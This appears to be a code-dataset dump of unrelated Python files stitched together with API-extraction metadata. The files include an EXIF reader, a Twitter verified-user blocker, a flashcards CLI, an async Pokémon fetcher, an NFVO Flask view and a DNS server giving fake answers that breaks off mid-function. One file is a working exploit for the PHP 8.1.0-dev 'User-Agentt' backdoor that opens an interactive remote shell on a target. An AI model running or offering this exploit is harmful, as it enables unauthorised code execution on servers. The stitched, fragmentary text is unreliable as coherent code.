exif_data = {}
info = self.img._getexif()
if info:
for tag, value in info.items():
decoded = TAGS.get(tag, tag)
if decoded == "GPSInfo":
gps_data = {}
for t in value:
sub_decoded = GPSTAGS.get(t, t)
gps_data[sub_decoded] = value[t]
exif_data[decoded] = gps_data
else:
exif_data[decoded] = value
self.exif_data = exif_data
# return exif_data
def get_date_time(self):
if 'DateTime' in self.exif_data:
date_and_time = self.exif_data['DateTime']
return date_and_time
def main():
date = image.date
print(date)
if __name__ == '__main__':
input_directory = os.path.join(os.getcwd(), 'input')
glob_path = os.path.join(input_directory, '*.jpg')
filepaths = glob.glob(glob_path)
for filepath in filepaths:
filename, extension = os.path.splitext(filepath)
try:
# img = PILimage.open(path + filename)
img = PILimage.open(filepath)
image = Worker(img)
date = image.date
print(date)
except Exception as e:
print(e)
| [
"PIL.Image.open",
"os.path.splitext",
"os.path.join",
"PIL.ExifTags.TAGS.get",
"os.getcwd",
"PIL.ExifTags.GPSTAGS.get",
"glob.glob"
] | [((1394, 1432), 'os.path.join', 'os.path.join', (['input_directory', '"""*.jpg"""'], {}), "(input_directory, '*.jpg')\n", (1406, 1432), False, 'import os\n'), ((1450, 1470), 'glob.glob', 'glob.glob', (['glob_path'], {}), '(glob_path)\n', (1459, 1470), False, 'import glob\n'), ((1356, 1367), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1365, 1367), False, 'import os\n'), ((1533, 1559), 'os.path.splitext', 'os.path.splitext', (['filepath'], {}), '(filepath)\n', (1549, 1559), False, 'import os\n'), ((1643, 1666), 'PIL.Image.open', 'PILimage.open', (['filepath'], {}), '(filepath)\n', (1656, 1666), True, 'import PIL.Image as PILimage\n'), ((655, 673), 'PIL.ExifTags.TAGS.get', 'TAGS.get', (['tag', 'tag'], {}), '(tag, tag)\n', (663, 673), False, 'from PIL.ExifTags import TAGS, GPSTAGS\n'), ((823, 840), 'PIL.ExifTags.GPSTAGS.get', 'GPSTAGS.get', (['t', 't'], {}), '(t, t)\n', (834, 840), False, 'from PIL.ExifTags import TAGS, GPSTAGS\n')] |
#!/usr/bin/python3
#### A tool for blocking all verified users on Twitter.
## You may want to create a (public or private) Twitter list named 'exceptions' and add verified users to it.
## This 'exceptions' list that you create on Twitter is for verified accounts that you like and do not want to block.
#### Import dependencies
import json
import tweepy
import re
import random
import sys
import timeit
#### Define variables
start = timeit.default_timer()
exception_title = 'exceptions'
mypath = "blocked.txt"
counter = 0
def get_api_keys():
#### Set Twitter API key dictionary
try: #### Attempt to load API keys file
keys_json = json.load(open('/usr/local/keys.json'))
#### Specify key dictionary wanted (generally [Platform][User][API])
Keys = keys_json["Twitter"]["ClimateCong_Bot"]["ClimatePolitics"]
#Keys = keys_json["Twitter"]["AGreenDCBike"]["HearHerVoice"]
except Exception as e:
er = e
if er.errno == 2: #File not found enter key dictionary values manually
print("\nNo twitter API key was found in /usr/local/keys.json\n",
"Acquire an API key at https://apps.twitter.com/\n",
"to supply key manually press Enter\n")
Keys = {}
Keys['Consumer Key (API Key)'] = input('Enter the Twitter API Consumer Key\n')
Keys['Consumer Secret (API Secret)'] = input('Enter tdhe Twitter API Consumer Secret Key\n')
Keys['Bearer Token'] = input('Enter the Bearer Token\n')
Keys['Owner'] = input('Enter your Twitter username associated with the API keys\n')
else:
print(e)
return(Keys)
#### Get keys
Keys = get_api_keys()
#### Access Twitter API using Tweepy & key dictionary definitions
client = tweepy.Client( Keys['Bearer Token'] )
auth = tweepy.OAuth2AppHandler( Keys['Consumer Key (API Key)'], Keys['Consumer Secret (API Secret)'] )
api = tweepy.API(auth)
#### Fetch the user id's of those listed in the exceptions list
def get_exceptions_list():
listed = []
protect_list = []
for page in tweepy.Cursor(api.list_members, user, exception_title).pages():
listed.extend(page)
for x in listed:
protect_list.append(x.id)
return(protect_list)
#### Checks id against exceptions list
def check_exceptions_list(a_user_id_2_block):
if a_user_id_2_block in protect_list:
#print("User is on exceptions list & will not be blocked:", a_user_id_2_block, end='\r')
return None
else:
return(a_user_id_2_block)
#### Returns a human readable time difference
def calc_time():
#Stop the timer
stop = timeit.default_timer()
total_time = stop - start
#Formate running time.
mins, secs = divmod(total_time, 60)
hours, mins = divmod(mins, 60)
timed = str("%d:%d:%d" % (hours, mins, secs))
return(timed)
#### Check if user is already blocked, blocks & add to list if not
def append_to_blocked_list(a_user_id_2_block):
with open(mypath, "r+", newline=None) as file:
for line in file:
if str(a_user_id_2_block) in line:
#print("Previously added to block list")
return None
else: # not found, we are at the eof
pass
file.write(str(a_user_id_2_block) + '\n') # append missing data
try:
api.create_block(a_user_id_2_block, wait_on_rate_limit=True)
except (ConnectionError, TimeoutError):
print("Will retry again in a little bit")
input("Press Enter to continue...")
except Exception as e:
er = e
if e.api_code == 160:
print("Request to befriend made, pending approval")
if e.api_code == 50:
print("User not found", str(a_user_id_2_block))
return("New")
#### Increments counter by 1, if count is divisible by 100 print the count & time elapsed.
def add_2_counter(counter):
counter += 1
if counter % 100 == 0:
timed = calc_time()
print("Time elapsed:", timed, " Users blocked:", str(counter))
else:
print(counter, end='\r')
pass
return(counter)
#### Process user id, check exceptions list, check & block & append to blocked list, trigger counter
def process_a_user_id(a_user_id, counter):
a_user_id_2_block = check_exceptions_list(a_user_id)
if a_user_id_2_block is not None:
#Check if user is already blocked & block if not
new_block = append_to_blocked_list(a_user_id_2_block)
if new_block is not None:
counter = add_2_counter(counter)
return(counter)
#### Get an id from user & send to id processing
def process_a_user(a_user, counter):
if a_user.verified == True:
a_user_id = a_user.id
counter = process_a_user_id(a_user_id, counter)
else:
pass
return(counter)
#### Work flow
#### Acquire 'exceptions' list for blocking protection/exclusion
protect_list = get_exceptions_list()
print("Protect list number of entries =", len(protect_list))
#### Block verified users that are on the twitter managed verified list
for a_user_id_2_block in tweepy.Cursor(api.friends_ids, id="verified", wait_on_rate_limit=True).items():
counter = process_a_user_id(a_user_id_2_block, counter)
#### Block verified users that are following you
for a_user in tweepy.Cursor(api.followers, screen_name=user, wait_on_rate_limit=True).items():
counter = process_a_user(a_user, counter)
#### Block verified users that are following the user handle "Twitter"
for a_user in tweepy.Cursor(api.followers, screen_name="Twitter", wait_on_rate_limit=True).items():
counter = process_a_user(a_user, counter)
###################################################################
# Do not use any of the code I have written with harmful intent. #
# #
# By using this code you accept that everyone has the #
# right to choose their own gender identity. #
###################################################################
| [
"tweepy.OAuth2AppHandler",
"tweepy.Cursor",
"timeit.default_timer",
"tweepy.API",
"tweepy.Client"
] | [((436, 458), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (456, 458), False, 'import timeit\n'), ((1903, 1938), 'tweepy.Client', 'tweepy.Client', (["Keys['Bearer Token']"], {}), "(Keys['Bearer Token'])\n", (1916, 1938), False, 'import tweepy\n'), ((1948, 2046), 'tweepy.OAuth2AppHandler', 'tweepy.OAuth2AppHandler', (["Keys['Consumer Key (API Key)']", "Keys['Consumer Secret (API Secret)']"], {}), "(Keys['Consumer Key (API Key)'], Keys[\n 'Consumer Secret (API Secret)'])\n", (1971, 2046), False, 'import tweepy\n'), ((2050, 2066), 'tweepy.API', 'tweepy.API', (['auth'], {}), '(auth)\n', (2060, 2066), False, 'import tweepy\n'), ((2770, 2792), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (2790, 2792), False, 'import timeit\n'), ((5292, 5362), 'tweepy.Cursor', 'tweepy.Cursor', (['api.friends_ids'], {'id': '"""verified"""', 'wait_on_rate_limit': '(True)'}), "(api.friends_ids, id='verified', wait_on_rate_limit=True)\n", (5305, 5362), False, 'import tweepy\n'), ((5496, 5567), 'tweepy.Cursor', 'tweepy.Cursor', (['api.followers'], {'screen_name': 'user', 'wait_on_rate_limit': '(True)'}), '(api.followers, screen_name=user, wait_on_rate_limit=True)\n', (5509, 5567), False, 'import tweepy\n'), ((5709, 5785), 'tweepy.Cursor', 'tweepy.Cursor', (['api.followers'], {'screen_name': '"""Twitter"""', 'wait_on_rate_limit': '(True)'}), "(api.followers, screen_name='Twitter', wait_on_rate_limit=True)\n", (5722, 5785), False, 'import tweepy\n'), ((2214, 2268), 'tweepy.Cursor', 'tweepy.Cursor', (['api.list_members', 'user', 'exception_title'], {}), '(api.list_members, user, exception_title)\n', (2227, 2268), False, 'import tweepy\n')] |
# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# - https://hub.docker.com/r/phpdaily/php
# - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:
# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
Contact: <EMAIL>
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
"""
#!/usr/bin/env python3
import os
import re
import requests
host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)
if str(response) == '<Response [200]>':
print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
try:
while 1:
cmd = input("$ ")
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"User-Agentt": "zerodiumsystem('" + cmd + "');"
}
response = request.get(host, headers = headers, allow_redirects = False)
current_page = response.text
stdout = current_page.split('<!DOCTYPE html>',1)
text = print(stdout[0])
except KeyboardInterrupt:
print("Exiting...")
exit
else:
print("\r")
print(response)
print("Host is not available, aborting...")
exit | [
"requests.Session"
] | [((1141, 1159), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1157, 1159), False, 'import requests\n')] |
"""
Module that contains the command line app.
Why does this file exist, and why not put this in __main__?
You might be tempted to import things from __main__ later, but that will cause
problems: the code will get executed twice:
- When you run `python -mflashcards` python will execute
``__main__.py`` as a script. That means there won't be any
``flashcards.__main__`` in ``sys.modules``.
- When you import __main__ it will get executed again (as a module) because
there's no ``flashcards.__main__`` in ``sys.modules``.
Also see (1) from http://click.pocoo.org/5/setuptools/#setuptools-integration
"""
import argparse
from .flashcards import start
parser = argparse.ArgumentParser(description='Command description.')
parser.add_argument('names', metavar='NAME', nargs=argparse.ZERO_OR_MORE,
help="A name of something.")
def get_arguments():
description = (
'Flashcards is a small command line tool used to study.\n'
'Shuffles the content for you and displays the title, once you think\n'
'you know the answer, by pressing [Enter] you can see the content.\n\n'
'Expected YML format (keywords are optional):\n\n'
'-\n'
' topic: Python\n'
' content: Is a widely used high-level programming language for\n'
' created by <NAME> and first released in 1991.\n'
' keywords: programming, language\n'
'-\n'
' topic: Javascript\n'
' content: Is a dynamic, untyped, and interpreted programming lang.\n')
formater = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(prog='flashcards', description=description,
formatter_class=formater)
parser.add_argument('file_name', metavar='FILE_NAME',
help='YML file with flashcards content')
parser.add_argument('-O', '--ordered', action="store_true", default=False,
help='Show cards keeping the file order')
parser.add_argument('-I', '--inverted', action="store_true", default=False,
help='Hide the topic instead of the content')
return parser.parse_args()
def main():
args = get_arguments()
start(args)
| [
"argparse.ArgumentParser"
] | [((686, 745), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Command description."""'}), "(description='Command description.')\n", (709, 745), False, 'import argparse\n'), ((1624, 1721), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""flashcards"""', 'description': 'description', 'formatter_class': 'formater'}), "(prog='flashcards', description=description,\n formatter_class=formater)\n", (1647, 1721), False, 'import argparse\n')] |
import aiohttp
import asyncio
import time
start_time = time.time()
async def get_pokemon(session,url):
async with session.get(url) as resp:
pokemon = await resp.json()
return pokemon["name"]
async def main():
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(limit=64,verify_ssl=False)) as session:
tasks = []
for i in range(1,200):
pok_url = f"https://pokeapi.co/api/v2/pokemon/{i}"
tasks.append(asyncio.ensure_future(get_pokemon(session,pok_url)))
original_pokemon = await asyncio.gather(*tasks)
for pok in original_pokemon:
print(pok)
asyncio.run(main())
print(f"--{(time.time()-start_time)}--") | [
"aiohttp.TCPConnector",
"time.time",
"asyncio.gather"
] | [((56, 67), 'time.time', 'time.time', ([], {}), '()\n', (65, 67), False, 'import time\n'), ((592, 614), 'asyncio.gather', 'asyncio.gather', (['*tasks'], {}), '(*tasks)\n', (606, 614), False, 'import asyncio\n'), ((285, 333), 'aiohttp.TCPConnector', 'aiohttp.TCPConnector', ([], {'limit': '(64)', 'verify_ssl': '(False)'}), '(limit=64, verify_ssl=False)\n', (305, 333), False, 'import aiohttp\n'), ((716, 727), 'time.time', 'time.time', ([], {}), '()\n', (725, 727), False, 'import time\n')] |
# -*- coding: utf-8 -*-
import logging
from logging import handlers
import pickle
import time
import uuid
from bson.binary import Binary
from bson.json_util import dumps
from flask import request
from flask_classful import FlaskView
import pymongo
from requests import ConnectTimeout, ConnectionError
from katana.shared_utils.mongoUtils import mongoUtils
from katana.shared_utils.nfvoUtils import osmUtils
# Logging Parameters
logger = logging.getLogger(__name__)
file_handler = handlers.RotatingFileHandler("katana.log", maxBytes=10000, backupCount=5)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
stream_formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
class NFVOView(FlaskView):
route_prefix = "/api/"
req_fields = ["id", "nfvousername", "nfvopassword", "nfvoip", "tenantname"]
def index(self):
"""
Returns a list of nfvo and their details,
used by: `katana nfvo ls`
"""
nfvo_data = mongoUtils.index("nfvo")
return_data = []
for infvo in nfvo_data:
return_data.append(
dict(
_id=infvo["_id"],
nfvo_id=infvo["id"],
created_at=infvo["created_at"],
type=infvo["type"],
)
)
return dumps(return_data), 200
# @route('/all/') #/nfvo/all
def all(self):
"""
Same with index(self) above, but returns all nfvo details
"""
return dumps(mongoUtils.index("nfvo")), 200
def get(self, uuid):
"""
Returns the details of specific nfvo,
used by: `katana nfvo inspect [uuid]`
"""
data = mongoUtils.get("nfvo", uuid)
if data:
return dumps(data), 200
else:
return "Not Found", 404
def post(self):
"""
Add a new nfvo. The request must provide the nfvo details.
used by: `katana nfvo add -f [yaml file]`
"""
new_uuid = str(uuid.uuid4())
request.json["_id"] = new_uuid
request.json["created_at"] = time.time() # unix epoch
request.json["tenants"] = {}
if request.json["type"] == "OSM":
# Create the NFVO object
try:
osm_username = request.json["nfvousername"]
osm_password = request.json["<PASSWORD>"]
osm_ip = request.json["nfvoip"]
osm_project_name = request.json["tenantname"]
nfvo_id = request.json["id"]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
else:
osm = osmUtils.Osm(nfvo_id, osm_ip, osm_username, osm_password, osm_project_name)
try:
osm.getToken()
except ConnectTimeout as e:
logger.exception("Connection Timeout: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
except ConnectionError as e:
logger.exception("Connection Error: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
else:
# Store the osm object to the mongo db
thebytes = pickle.dumps(osm)
obj_json = {"_id": new_uuid, "id": request.json["id"], "obj": Binary(thebytes)}
try:
new_uuid = mongoUtils.add("nfvo", request.json)
except pymongo.errors.DuplicateKeyError:
return f"NFVO with id {nfvo_id} already exists", 400
mongoUtils.add("nfvo_obj", obj_json)
# Get information regarding VNFDs and NSDs
osm.bootstrapNfvo()
return f"Created {new_uuid}", 201
else:
response = dumps({"error": "This type nfvo is not supported"})
return response, 400
def delete(self, uuid):
"""
Delete a specific nfvo.
used by: `katana nfvo rm [uuid]`
"""
del_nfvo = mongoUtils.get("nfvo", uuid)
if del_nfvo:
if del_nfvo["tenants"]:
return "Cannot delete nfvo {} - In use".format(uuid), 400
mongoUtils.delete("nfvo_obj", uuid)
mongoUtils.delete_all("nsd", {"nfvo_id": del_nfvo["id"]})
mongoUtils.delete_all("vnfd", {"nfvoid": del_nfvo["id"]})
mongoUtils.delete("nfvo", uuid)
return "Deleted NFVO {}".format(uuid), 200
else:
# if uuid is not found, return error
return "Error: No such nfvo: {}".format(uuid), 404
def put(self, uuid):
"""
Update the details of a specific nfvo.
used by: `katana nfvo update -f [yaml file] [uuid]`
"""
data = request.json
data["_id"] = uuid
old_data = mongoUtils.get("nfvo", uuid)
if old_data:
data["created_at"] = old_data["created_at"]
data["tenants"] = old_data["tenants"]
try:
for entry in self.req_fields:
if data[entry] != old_data[entry]:
return "Cannot update field: " + entry, 400
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
else:
mongoUtils.update("nfvo", uuid, data)
return f"Modified {uuid}", 200
else:
new_uuid = uuid
data = request.json
data["_id"] = new_uuid
data["created_at"] = time.time() # unix epoch
data["tenants"] = {}
if request.json["type"] == "OSM":
# Create the NFVO object
try:
osm_username = request.json["nfvousername"]
osm_password = request.json["nfvopassword"]
osm_ip = request.json["nfvoip"]
osm_project_name = request.json["tenantname"]
nfvo_id = request.json["id"]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
else:
osm = osmUtils.Osm(
nfvo_id, osm_ip, osm_username, osm_password, osm_project_name
)
try:
osm.getToken()
except ConnectTimeout as e:
logger.exception("Connection Timeout: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
except ConnectionError as e:
logger.exception("Connection Error: {}".format(e))
response = dumps({"error": "Unable to connect to NFVO"})
return (response, 400)
else:
# Store the osm object to the mongo db
thebytes = pickle.dumps(osm)
obj_json = {"_id": new_uuid, "id": data["id"], "obj": Binary(thebytes)}
try:
new_uuid = mongoUtils.add("nfvo", data)
except pymongo.errors.DuplicateKeyError:
return f"NFVO with id {nfvo_id} already exists", 400
mongoUtils.add("nfvo_obj", obj_json)
# Get information regarding VNFDs and NSDs
osm.bootstrapNfvo()
else:
response = dumps({"error": "This type nfvo is not supported"})
return response, 400
return f"Created {new_uuid}", 201
| [
"logging.getLogger",
"katana.shared_utils.mongoUtils.mongoUtils.add",
"logging.StreamHandler",
"katana.shared_utils.mongoUtils.mongoUtils.update",
"katana.shared_utils.mongoUtils.mongoUtils.delete_all",
"bson.binary.Binary",
"katana.shared_utils.nfvoUtils.osmUtils.Osm",
"logging.Formatter",
"katana.... | [((439, 466), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (456, 466), False, 'import logging\n'), ((482, 555), 'logging.handlers.RotatingFileHandler', 'handlers.RotatingFileHandler', (['"""katana.log"""'], {'maxBytes': '(10000)', 'backupCount': '(5)'}), "('katana.log', maxBytes=10000, backupCount=5)\n", (510, 555), False, 'from logging import handlers\n'), ((573, 596), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (594, 596), False, 'import logging\n'), ((609, 676), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s %(name)s %(levelname)s %(message)s"""'], {}), "('%(asctime)s %(name)s %(levelname)s %(message)s')\n", (626, 676), False, 'import logging\n'), ((696, 763), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s %(name)s %(levelname)s %(message)s"""'], {}), "('%(asctime)s %(name)s %(levelname)s %(message)s')\n", (713, 763), False, 'import logging\n'), ((1230, 1254), 'katana.shared_utils.mongoUtils.mongoUtils.index', 'mongoUtils.index', (['"""nfvo"""'], {}), "('nfvo')\n", (1246, 1254), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((1960, 1988), 'katana.shared_utils.mongoUtils.mongoUtils.get', 'mongoUtils.get', (['"""nfvo"""', 'uuid'], {}), "('nfvo', uuid)\n", (1974, 1988), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((2367, 2378), 'time.time', 'time.time', ([], {}), '()\n', (2376, 2378), False, 'import time\n'), ((4405, 4433), 'katana.shared_utils.mongoUtils.mongoUtils.get', 'mongoUtils.get', (['"""nfvo"""', 'uuid'], {}), "('nfvo', uuid)\n", (4419, 4433), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((5209, 5237), 'katana.shared_utils.mongoUtils.mongoUtils.get', 'mongoUtils.get', (['"""nfvo"""', 'uuid'], {}), "('nfvo', uuid)\n", (5223, 5237), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((1584, 1602), 'bson.json_util.dumps', 'dumps', (['return_data'], {}), '(return_data)\n', (1589, 1602), False, 'from bson.json_util import dumps\n'), ((2277, 2289), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (2287, 2289), False, 'import uuid\n'), ((4175, 4226), 'bson.json_util.dumps', 'dumps', (["{'error': 'This type nfvo is not supported'}"], {}), "({'error': 'This type nfvo is not supported'})\n", (4180, 4226), False, 'from bson.json_util import dumps\n'), ((4577, 4612), 'katana.shared_utils.mongoUtils.mongoUtils.delete', 'mongoUtils.delete', (['"""nfvo_obj"""', 'uuid'], {}), "('nfvo_obj', uuid)\n", (4594, 4612), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((4625, 4682), 'katana.shared_utils.mongoUtils.mongoUtils.delete_all', 'mongoUtils.delete_all', (['"""nsd"""', "{'nfvo_id': del_nfvo['id']}"], {}), "('nsd', {'nfvo_id': del_nfvo['id']})\n", (4646, 4682), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((4695, 4752), 'katana.shared_utils.mongoUtils.mongoUtils.delete_all', 'mongoUtils.delete_all', (['"""vnfd"""', "{'nfvoid': del_nfvo['id']}"], {}), "('vnfd', {'nfvoid': del_nfvo['id']})\n", (4716, 4752), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((4765, 4796), 'katana.shared_utils.mongoUtils.mongoUtils.delete', 'mongoUtils.delete', (['"""nfvo"""', 'uuid'], {}), "('nfvo', uuid)\n", (4782, 4796), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((5911, 5922), 'time.time', 'time.time', ([], {}), '()\n', (5920, 5922), False, 'import time\n'), ((1772, 1796), 'katana.shared_utils.mongoUtils.mongoUtils.index', 'mongoUtils.index', (['"""nfvo"""'], {}), "('nfvo')\n", (1788, 1796), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((2025, 2036), 'bson.json_util.dumps', 'dumps', (['data'], {}), '(data)\n', (2030, 2036), False, 'from bson.json_util import dumps\n'), ((2942, 3017), 'katana.shared_utils.nfvoUtils.osmUtils.Osm', 'osmUtils.Osm', (['nfvo_id', 'osm_ip', 'osm_username', 'osm_password', 'osm_project_name'], {}), '(nfvo_id, osm_ip, osm_username, osm_password, osm_project_name)\n', (2954, 3017), False, 'from katana.shared_utils.nfvoUtils import osmUtils\n'), ((3607, 3624), 'pickle.dumps', 'pickle.dumps', (['osm'], {}), '(osm)\n', (3619, 3624), False, 'import pickle\n'), ((3956, 3992), 'katana.shared_utils.mongoUtils.mongoUtils.add', 'mongoUtils.add', (['"""nfvo_obj"""', 'obj_json'], {}), "('nfvo_obj', obj_json)\n", (3970, 3992), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((5688, 5725), 'katana.shared_utils.mongoUtils.mongoUtils.update', 'mongoUtils.update', (['"""nfvo"""', 'uuid', 'data'], {}), "('nfvo', uuid, data)\n", (5705, 5725), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((7837, 7888), 'bson.json_util.dumps', 'dumps', (["{'error': 'This type nfvo is not supported'}"], {}), "({'error': 'This type nfvo is not supported'})\n", (7842, 7888), False, 'from bson.json_util import dumps\n'), ((3202, 3247), 'bson.json_util.dumps', 'dumps', (["{'error': 'Unable to connect to NFVO'}"], {}), "({'error': 'Unable to connect to NFVO'})\n", (3207, 3247), False, 'from bson.json_util import dumps\n'), ((3422, 3467), 'bson.json_util.dumps', 'dumps', (["{'error': 'Unable to connect to NFVO'}"], {}), "({'error': 'Unable to connect to NFVO'})\n", (3427, 3467), False, 'from bson.json_util import dumps\n'), ((3703, 3719), 'bson.binary.Binary', 'Binary', (['thebytes'], {}), '(thebytes)\n', (3709, 3719), False, 'from bson.binary import Binary\n'), ((3773, 3809), 'katana.shared_utils.mongoUtils.mongoUtils.add', 'mongoUtils.add', (['"""nfvo"""', 'request.json'], {}), "('nfvo', request.json)\n", (3787, 3809), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((6532, 6607), 'katana.shared_utils.nfvoUtils.osmUtils.Osm', 'osmUtils.Osm', (['nfvo_id', 'osm_ip', 'osm_username', 'osm_password', 'osm_project_name'], {}), '(nfvo_id, osm_ip, osm_username, osm_password, osm_project_name)\n', (6544, 6607), False, 'from katana.shared_utils.nfvoUtils import osmUtils\n'), ((7295, 7312), 'pickle.dumps', 'pickle.dumps', (['osm'], {}), '(osm)\n', (7307, 7312), False, 'import pickle\n'), ((7652, 7688), 'katana.shared_utils.mongoUtils.mongoUtils.add', 'mongoUtils.add', (['"""nfvo_obj"""', 'obj_json'], {}), "('nfvo_obj', obj_json)\n", (7666, 7688), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((6858, 6903), 'bson.json_util.dumps', 'dumps', (["{'error': 'Unable to connect to NFVO'}"], {}), "({'error': 'Unable to connect to NFVO'})\n", (6863, 6903), False, 'from bson.json_util import dumps\n'), ((7094, 7139), 'bson.json_util.dumps', 'dumps', (["{'error': 'Unable to connect to NFVO'}"], {}), "({'error': 'Unable to connect to NFVO'})\n", (7099, 7139), False, 'from bson.json_util import dumps\n'), ((7387, 7403), 'bson.binary.Binary', 'Binary', (['thebytes'], {}), '(thebytes)\n', (7393, 7403), False, 'from bson.binary import Binary\n'), ((7465, 7493), 'katana.shared_utils.mongoUtils.mongoUtils.add', 'mongoUtils.add', (['"""nfvo"""', 'data'], {}), "('nfvo', data)\n", (7479, 7493), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n')] |
import threading
import traceback
import socketserver
import struct
import time
import sys
import http.client
import json
import uuid
import config
import dns.rdatatype
import dns.rdataclass
args = config.args
QTYPES = {1:'A', 15: 'MX', 6: 'SOA'}
custom_mx = uuid.uuid4().hex
# https://github.com/shuque/pydig GNUv2 (edited)
def txt2domainname(input, canonical_form=False):
"""turn textual representation of a domain name into its wire format"""
if input == ".":
d = b'\x00'
else:
d = b""
for label in input.split('.'):
label = label.encode('ascii')
if canonical_form:
label = label.lower()
length = len(label)
d += struct.pack('B', length) + label
return d
# https://github.com/shuque/pydig GNUv2 (edited)
def get_domainname(pkt, offset):
"""decode a domainname at the given packet offset; see RFC 1035"""
global count_compression
labellist = [] # a domainname is a sequence of labels
Done = False
while not Done:
llen, = struct.unpack('B', pkt[offset:offset+1])
if (llen >> 6) == 0x3: # compression pointer, sec 4.1.4
count_compression += 1
c_offset, = struct.unpack('!H', pkt[offset:offset+2])
c_offset = c_offset & 0x3fff # last 14 bits
offset +=2
rightmostlabels, junk = get_domainname(pkt, c_offset)
labellist += rightmostlabels
Done = True
else:
offset += 1
label = pkt[offset:offset+llen]
offset += llen
labellist.append(label)
if llen == 0:
Done = True
return (labellist, offset)
def ip2bytes(ip):
return struct.pack('!BBBB', *map(int, ip.split('.')))
# https://github.com/shuque/pydig GNUv2 (edited)
def pdomainname(labels):
"""given a sequence of domainname labels, return a quoted printable text
representation of the domain name"""
printables = b'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-*+'
result_list = []
for label in labels:
result = ''
for c in label:
if isinstance(c, int):
c_int, c_chr = c, chr(c)
else:
c_int, c_chr = ord(c), c.decode()
if c in printables:
result += c_chr
else:
result += ("\\%03d" % c_int)
result_list.append(result)
if result_list == ['']:
return "."
else:
return ".".join(result_list)
def resolve_remote(query):
domainName, type, klass = query
if type not in [1, 15, 6]:
return (3, [], [])
h1 = http.client.HTTPSConnection('dns.google.com')
h1.request('GET', '/resolve?name={}&type={}'.format(domainName, type))
r1 = h1.getresponse()
data = json.loads(r1.read().decode('utf-8'))
answers = []
if 'Answer' in data:
for answer in data['Answer']:
a = (answer['name'], answer['type'], klass, answer['TTL'], answer['data'])
answers.append(a)
authority = []
if 'Authority' in data:
for answer in data['Authority']:
a = (answer['name'], answer['type'], klass, answer['TTL'], answer['data'])
authority.append(a)
return (int(data['Status']), answers, authority)
def resolve_fake(query, ip):
domainName, type, klass = query
answers = []
if type not in [1, 15, 6]:
return (3, answers, [])
# sam sebe pan pri ostatnych
if type == 1:
a = (domainName, type, klass, 1, str(ip))
answers.append(a)
# sam sebe pan pri MX
if type == 15:
a = (domainName, type, klass, 1, '10 ' + domainName)
answers.append(a)
return (0, answers, [])
def build_answer_data(answer):
dn, type, cl, ttl, data = answer
if type == 1:
print('r: {}, type: {}, class {}, addr {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), data))
return txt2domainname(dn) + struct.pack('!HHIH', type, cl, ttl, 4) + ip2bytes(data)
if type == 15:
priority, addr = data.split(' ', 2)
if not addr.endswith('.'):
addr += '.'
print('r: {}, type: {}, class {}, preference {}, mx {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), priority, addr))
addr = txt2domainname(addr)
return txt2domainname(dn) + struct.pack('!HHIHH', type, cl, ttl, 2 + len(addr), int(priority)) + addr
if type == 6:
